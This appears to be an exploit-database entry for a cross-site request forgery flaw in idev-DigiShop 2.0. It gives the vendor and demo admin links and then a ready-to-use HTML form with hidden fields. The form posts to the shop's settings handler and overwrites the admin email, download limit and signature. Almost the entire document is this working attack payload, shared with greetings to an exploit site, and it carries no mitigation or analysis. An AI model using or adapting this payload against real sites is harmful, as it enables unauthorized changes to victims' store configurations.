idev-DigiShop version 2.0 suffers from a cross site request forgery vulnerability.
e42db12792115219323312493e526a4b59082e25ca269ff0b6c715bb2320b593
# Exploit Title: idev-DigiShop 2.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-digishop/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form name="form1" method="post" action="../library/query.php">
<input name="controller" value="SETTINGS~update~settings~1" type="hidden">
<input name="EMAIL" class="hiddenarea100" value="noreply@idevspot.com" type="hidden">
<input name="MAXDL" class="hiddenarea100" value="25" type="hidden">
<input name="SIGNATURE" class="hiddenarea100" value="idev-DigiShop" type="hidden">
<input name="AFFID" class="hiddenarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option selected> Show</option><option>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">